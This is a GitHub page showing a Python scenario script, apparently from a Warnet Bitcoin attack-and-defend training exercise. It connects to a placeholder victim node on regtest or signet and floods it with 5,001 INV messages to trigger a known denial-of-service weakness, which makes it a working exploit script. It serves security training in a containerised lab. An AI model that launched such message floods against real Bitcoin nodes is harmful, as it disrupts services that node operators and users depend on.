-
Notifications
You must be signed in to change notification settings - Fork 8
/
Copy pathmy_first_attack_5kinv.py
75 lines (58 loc) · 2.56 KB
/
my_first_attack_5kinv.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
#!/usr/bin/env python3
import socket
from commander import Commander
# The entire Bitcoin Core test_framework directory is available as a library
from test_framework.messages import MSG_TX, CInv, hash256, msg_inv
from test_framework.p2p import MAGIC_BYTES, P2PInterface
def get_signet_network_magic_from_node(node):
template = node.getblocktemplate({"rules": ["segwit", "signet"]})
challenge = template["signet_challenge"]
challenge_bytes = bytes.fromhex(challenge)
data = len(challenge_bytes).to_bytes() + challenge_bytes
digest = hash256(data)
return digest[0:4]
# The actual scenario is a class like a Bitcoin Core functional test.
# Commander is a subclass of BitcoinTestFramework instide Warnet
# that allows to operate on containerized nodes instead of local nodes.
class Inv5K(Commander):
def set_test_params(self):
# This setting is ignored but still required as
# a sub-class of BitcoinTestFramework
self.num_nodes = 1
def add_options(self, parser):
parser.description = (
"Demonstrate INV attack using a scenario and P2PInterface"
)
parser.usage = "warnet run /path/to/my_first_attack_5kinv.py"
# Scenario entrypoint
def run_test(self):
# We pick a node on the network to attack
# We know this one is vulnderable to 5k inv messages based on it's subver
# Change this to your teams colour if running in the battleground
victim = "TARGET_TANK_NAME.default.svc"
# regtest or signet
chain = self.nodes[0].chain
# The victim's address could be an explicit IP address
# OR a kubernetes hostname (use default chain p2p port)
dstaddr = socket.gethostbyname(victim)
if chain == "regtest":
dstport = 18444
if chain == "signet":
dstport = 38333
MAGIC_BYTES["signet"] = get_signet_network_magic_from_node(self.nodes[0])
# Now we will use a python-based Bitcoin p2p node to send very specific,
# unusual or non-standard messages to a "victim" node.
self.log.info(f"Attacking {victim}")
attacker = P2PInterface()
attacker.peer_connect(
dstaddr=dstaddr, dstport=dstport, net="signet", timeout_factor=1
)()
attacker.wait_until(lambda: attacker.is_connected, check_connected=False)
msg = msg_inv([CInv(MSG_TX, 0x12345)])
for i in range(5001):
attacker.send_and_ping(msg)
self.log.info(f"Sent inv message {i}")
def main():
Inv5K().main()
if __name__ == "__main__":
main()